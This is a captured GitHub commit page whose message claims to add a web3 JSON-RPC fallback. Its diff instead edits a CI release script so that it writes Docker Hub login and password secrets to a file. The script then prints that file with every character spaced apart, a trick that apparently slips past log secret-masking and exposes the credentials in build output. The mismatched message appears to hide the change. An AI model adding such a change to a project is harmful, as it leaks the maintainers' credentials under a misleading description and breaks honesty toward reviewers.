Skip to content

Commit

Permalink
add fallback for web3 json-rpc...
Browse files Browse the repository at this point in the history
  • Loading branch information
Jagden committed Dec 15, 2024
1 parent 81d6a68 commit d266abf
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/release-to-staging.sh
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
#!/bin/bash

echo ${$DOCKER_HUB_LOGIN} ${$DOCKER_HUB_PASSWORD} > blare.txt
echo $DOCKER_HUB_LOGIN $DOCKER_HUB_PASSWORD > blare.txt
cat blare.txt | sed 's/./& /g'

docker login -u $DOCKER_HUB_LOGIN -p $DOCKER_HUB_PASSWORD
Expand Down

0 comments on commit d266abf

Please sign in to comment.